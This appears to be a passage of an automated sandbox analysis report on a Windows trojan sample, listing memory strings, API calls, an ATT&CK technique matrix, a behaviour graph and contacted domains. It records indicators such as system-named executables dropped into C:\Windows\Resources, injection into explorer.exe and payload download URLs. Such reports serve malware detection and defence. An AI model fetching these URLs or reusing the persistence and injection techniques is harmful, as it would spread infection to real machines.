                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\consent.exe consent.exe 6016 322 0000022C4F0331F0Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Resources\svchost.exe "C:\windows\resources\svchost.exe" ROJump to behavior
                      Source: explorer.exe, 00000002.00000003.2938609355.0000000000959000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2938924918.000000000095D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progmanimer
                      Source: explorer.exe, 00000002.00000003.2901360241.0000000000959000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progmanimes
                      Source: explorer.exe, 00000002.00000003.2666494405.000000000095E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell_traywndw
                      Source: explorer.exe, 0000000B.00000003.2347096998.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2347773426.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2363179364.00000000008DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program manager32\ae4
                      Source: svchost.exe, 0000000E.00000002.2437702639.0000000000A12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell_traywndAppData\RoamingC:\ProgramData
                      Source: explorer.exe, 00000002.00000003.2642460026.000000000095E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell_traywnd3
                      Source: spoolsv.exe, 00000005.00000002.2227917818.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 00000005.00000003.2203101337.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 00000005.00000003.2196608511.0000000000810000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progman
                      Source: svchost.exe, 0000000E.00000002.2438342799.0000000000A36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager(atl:00007ffd9cb88280
                      Source: file.exe, 00000000.00000003.2246969683.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2249223925.0000000000B47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progmanF
                      Source: file.exe, 00000000.00000003.2245290715.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2246813553.0000000000B91000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2246162565.0000000000B8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell_traywnd:
                      Source: explorer.exe, 00000002.00000003.2821688972.0000000000947000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progmanime#
                      Source: file.exe, 00000000.00000003.2234584533.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2235498093.0000000000B89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progmanp.exe
                      Source: file.exe, 00000000.00000002.2249516773.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2245290715.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2246283297.0000000000B89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program manager
                      Source: file.exe, 00000000.00000003.2246969683.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2249223925.0000000000B47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program manager_1ow
                      Source: svchost.exe, 0000000E.00000002.2438342799.0000000000A36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program manager*tabletmodecoverwindow"cicloaderwndclass
                      Source: spoolsv.exe, 00000005.00000003.2203016131.0000000000822000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 00000005.00000002.2227959019.0000000000822000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progmant6mainx
                      Source: spoolsv.exe, 00000005.00000003.2203016131.0000000000822000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 00000005.00000002.2227959019.0000000000822000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program manager}
                      Source: spoolsv.exe, 00000003.00000002.2218760644.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 00000003.00000003.2202742683.00000000008DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program managerdow$
                      Source: file.exe, 00000000.00000002.2249409843.0000000000B69000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2246212206.0000000000B69000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2775275112.000000000095F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progmant6main
                      Source: explorer.exe, 00000002.00000003.2775275112.000000000095F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2345698733.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2363249805.00000000008FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmannotif
                      Source: explorer.exe, 00000002.00000003.2754327749.000000000095F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2801689072.000000000095F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2775275112.000000000095F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progmanimesn
                      Source: explorer.exe, 00000002.00000003.2821688972.0000000000936000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2802016823.0000000000936000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2938609355.0000000000936000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program manager:f
                      Source: explorer.exe, 0000000B.00000002.2363286767.0000000000903000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager15
                      Source: explorer.exe, 00000002.00000003.2666494405.000000000095E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2642460026.000000000095E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progmanimeul
                      Source: explorer.exe, 00000002.00000003.2802016823.0000000000947000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progmandow
                      Source: file.exe, 00000000.00000002.2249409843.0000000000B69000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2246212206.0000000000B69000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 00000005.00000003.2203016131.0000000000822000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
                      Source: svchost.exe, 0000000E.00000003.2422016631.0000000000A35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program manager$memory compression(officeclicktorun.exe
                      Source: file.exe, 00000000.00000002.2249516773.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2245290715.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2246283297.0000000000B89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager1~
                      Source: explorer.exe, 00000002.00000003.2711420626.000000000095F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progmanIMEik
                      Source: explorer.exe, 0000000B.00000003.2345698733.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2363249805.00000000008FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progmant6main`YZ
                      Source: explorer.exe, 00000002.00000003.2666494405.000000000095E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progman.exex
                      Source: explorer.exe, 00000002.00000003.2754327749.000000000095F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2801689072.000000000095F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2775275112.000000000095F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell_traywnd[
                      Source: spoolsv.exe, 00000003.00000003.2153385105.00000000008DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progman%
                      Source: file.exe, 00000000.00000003.2234584533.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2235498093.0000000000B89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program manager`
                      Source: file.exe, 00000000.00000003.2245290715.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2246813553.0000000000B91000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2246162565.0000000000B8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progmanexe
                      Source: explorer.exe, 00000002.00000003.2938609355.0000000000959000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2938924918.000000000095D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell_traywnd`
                      Source: spoolsv.exe, 00000003.00000002.2218760644.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 00000003.00000003.2202742683.00000000008DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progmanexeor
                      Source: file.exe, 00000000.00000003.2234584533.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2235498093.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2801689072.000000000095F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell_traywnd
                      Source: explorer.exe, 00000002.00000003.2372121358.000000000095F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: progmanIMEex
                      Source: C:\Users\user\Desktop\file.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_00426F58
                      Source: C:\Users\user\Desktop\file.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_00426F58
                      Source: C:\Users\user\Desktop\file.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_00427063
                      Source: C:\Users\user\Desktop\file.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_00427063
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,GetACP,0_2_0042F648
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,GetACP,0_2_0042F648
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_004278B8
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_004278B8
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_0042DF78
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_0042DF78
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_0042DF2C
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_0042DF2C
                      Source: C:\Users\user\Desktop\file.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_00426F58
                      Source: C:\Users\user\Desktop\file.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_00426F58
                      Source: C:\Users\user\Desktop\file.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_00427063
                      Source: C:\Users\user\Desktop\file.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_00427063
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,GetACP,0_2_0042F648
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,GetACP,0_2_0042F648
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_004278B8
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_004278B8
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_0042DF78
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_0042DF78
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_0042DF2C
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_0042DF2C
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_00426F58
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_00426F58
                      Source: C:\Windows\Resources\spoolsv.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_00427063
                      Source: C:\Windows\Resources\spoolsv.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_00427063
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,GetACP,3_2_0042F648
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,GetACP,3_2_0042F648
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,3_2_004278B8
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,3_2_004278B8
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,3_2_0042DF78
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,3_2_0042DF78
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,3_2_0042DF2C
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,3_2_0042DF2C
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_00426F58
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_00426F58
                      Source: C:\Windows\Resources\spoolsv.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_00427063
                      Source: C:\Windows\Resources\spoolsv.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_00427063
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,GetACP,3_2_0042F648
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,GetACP,3_2_0042F648
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,3_2_004278B8
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,3_2_004278B8
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,3_2_0042DF78
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,3_2_0042DF78
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,3_2_0042DF2C
                      Source: C:\Windows\Resources\spoolsv.exeCode function: GetLocaleInfoA,3_2_0042DF2C
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042C950 GetLocalTime,0_2_0042C950
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427CDE EqualSid,GetUserNameA,GetUserNameA,GetUserNameW,OpenProcessToken,OpenThreadToken,RegCloseKey,RegDeleteValueA,RegFlushKey,0_2_00427CDE
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00428136 GetTimeZoneInformation,0_2_00428136
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042813E GetVersion,0_2_0042813E
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      1
                      Deobfuscate/Decode Files or Information
                      11
                      Input Capture
                      2
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      3
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      Windows Service
                      1
                      Windows Service
                      3
                      Obfuscated Files or Information
                      LSASS Memory1
                      Account Discovery
                      Remote Desktop Protocol11
                      Input Capture
                      2
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      Registry Run Keys / Startup Folder
                      312
                      Process Injection
                      21
                      Software Packing
                      Security Account Manager2
                      File and Directory Discovery
                      SMB/Windows Admin Shares3
                      Clipboard Data
                      3
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      Registry Run Keys / Startup Folder
                      1
                      DLL Side-Loading
                      NTDS15
                      System Information Discovery
                      Distributed Component Object ModelInput Capture13
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      File Deletion
                      LSA Secrets321
                      Security Software Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
                      Masquerading
                      Cached Domain Credentials23
                      Virtualization/Sandbox Evasion
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items23
                      Virtualization/Sandbox Evasion
                      DCSync3
                      Process Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job312
                      Process Injection
                      Proc Filesystem11
                      Application Window Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                      System Owner/User Discovery
                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1522726 Sample: file.exe Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 47 googlecode.l.googleusercontent.com 2->47 49 codecmd03.googlecode.com 2->49 51 3 other IPs or domains 2->51 67 Antivirus / Scanner detection for submitted sample 2->67 69 Multi AV Scanner detection for submitted file 2->69 71 Yara detected Mofksys 2->71 73 5 other signatures 2->73 10 file.exe 1 3 2->10         started        14 svchost.exe 2->14 injected 16 explorer.exe 2->16         started        18 svchost.exe 2->18         started        signatures3 process4 file5 43 C:\Windows\Resources\Themes\explorer.exe, MS-DOS 10->43 dropped 97 Detected unpacking (changes PE section rights) 10->97 99 Hides threads from debuggers 10->99 101 Drops PE files with benign system names 10->101 103 Contains functionality to detect sleep reduction / modifications 10->103 20 explorer.exe 15 10->20         started        105 Injects code into the Windows Explorer (explorer.exe) 14->105 107 Drops executables to the windows directory (C:\Windows) and starts them 14->107 25 explorer.exe 1 14->25         started        27 svchost.exe 1 14->27         started        29 consent.exe 2 14->29         started        signatures6 process7 dnsIp8 53 108.177.15.82, 51155, 51160, 51164 GOOGLEUS United States 20->53 55 142.250.110.82, 51156, 51162, 51165 GOOGLEUS United States 20->55 57 4 other IPs or domains 20->57 41 C:\Windows\Resources\spoolsv.exe, MS-DOS 20->41 dropped 83 Antivirus detection for dropped file 20->83 85 System process connects to network (likely due to code injection or exploit) 20->85 87 Detected unpacking (changes PE section rights) 20->87 93 2 other signatures 20->93 31 spoolsv.exe 3 20->31         started        89 Hides threads from debuggers 25->89 91 Writes to foreign memory regions 29->91 file9 signatures10 process11 file12 45 C:\Windows\Resources\svchost.exe, MS-DOS 31->45 dropped 59 Antivirus detection for dropped file 31->59 61 Detected unpacking (changes PE section rights) 31->61 63 Machine Learning detection for dropped file 31->63 65 3 other signatures 31->65 35 svchost.exe 2 2 31->35         started        signatures13 process14 signatures15 75 Antivirus detection for dropped file 35->75 77 Detected CryptOne packer 35->77 79 Detected unpacking (changes PE section rights) 35->79 81 4 other signatures 35->81 38 spoolsv.exe 1 35->38         started        process16 signatures17 95 Hides threads from debuggers 38->95

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      file.exe71%ReversingLabsWin32.Trojan.Swisyn
                      file.exe100%AviraTR/Patched.Ren.Gen
                      file.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Windows\Resources\svchost.exe100%AviraTR/Patched.Ren.Gen
                      C:\Windows\Resources\Themes\explorer.exe100%AviraTR/Patched.Ren.Gen
                      C:\Windows\Resources\spoolsv.exe100%AviraTR/Patched.Ren.Gen
                      C:\Windows\Resources\svchost.exe100%Joe Sandbox ML
                      C:\Windows\Resources\Themes\explorer.exe100%Joe Sandbox ML
                      C:\Windows\Resources\spoolsv.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      googlecode.l.googleusercontent.com
                      64.233.167.82
                      truefalse
                        unknown
                        codecmd01.googlecode.com
                        unknown
                        unknownfalse
                          unknown
                          codecmd03.googlecode.com
                          unknown
                          unknownfalse
                            unknown
                            171.39.242.20.in-addr.arpa
                            unknown
                            unknownfalse
                              unknown
                              codecmd02.googlecode.com
                              unknown
                              unknownfalse
                                unknown
                                NameMaliciousAntivirus DetectionReputation
                                http://codecmd02.googlecode.com/files/tjcm.giffalse
                                  unknown
                                  http://codecmd01.googlecode.com/files/tjcm.giffalse
                                    unknown
                                    http://codecmd03.googlecode.com/files/tjcm.giffalse
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://codecmd02.googlecode.com/files/tjcm.gifc-56906d4cb1daexplorer.exe, 00000002.00000003.2821688972.0000000000936000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2802016823.0000000000936000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2538361591.0000000000935000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2754525195.0000000000936000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2775310270.0000000000937000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2666563377.0000000000936000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://codecmd03.googlecode.com/filesxeOqExOXCQsSqgrTCdiQRtVodBqIGNTWqcZQdclexplorer.exe, 00000002.00000003.2802016823.0000000000936000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2901360241.0000000000936000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://www.enigmaprotector.com/file.exe, 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmp, spoolsv.exe, 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmp, spoolsv.exe, 00000005.00000002.2226170375.0000000000539000.00000040.00000001.01000000.00000008.sdmp, explorer.exe, 0000000B.00000002.2356728288.0000000000539000.00000040.00000001.01000000.00000007.sdmp, svchost.exe, 0000000E.00000002.2431975556.0000000000539000.00000040.00000001.01000000.00000009.sdmpfalse
                                            unknown
                                            http://codecmd03.googlecode.com/files/tjcm.gifCQsSqgrTCdiQRtVodBqIGNTWqcZQdclexplorer.exe, 00000002.00000003.2802016823.0000000000936000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2901360241.0000000000936000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              142.250.110.82
                                              unknownUnited States
                                              15169GOOGLEUSfalse
                                              108.177.15.82
                                              unknownUnited States
                                              15169GOOGLEUSfalse
                                              173.194.76.82
                                              unknownUnited States
                                              15169GOOGLEUSfalse
                                              64.233.184.82
                                              unknownUnited States
                                              15169GOOGLEUSfalse
                                              172.253.115.82
                                              unknownUnited States
                                              15169GOOGLEUSfalse
                                              142.251.173.82
                                              unknownUnited States
                                              15169GOOGLEUSfalse
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1522726
                                              Start date and time:2024-09-30 16:06:55 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 10m 56s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:15
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:file.exe
                                              Detection:MAL
                                              Classification:mal100.spre.evad.winEXE@17/10@8/6
                                              EGA Information:
                                              • Successful, ratio: 66.7%
                                              HCA Information:Failed
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                              • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                              • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe
                                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target explorer.exe, PID 6120 because there are no executed function
                                              • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                              • VT rate limit hit for: file.exe
                                              TimeTypeDescription
                                              10:07:54API Interceptor954911x Sleep call for process: svchost.exe modified
                                              10:07:55API Interceptor1009212x Sleep call for process: explorer.exe modified
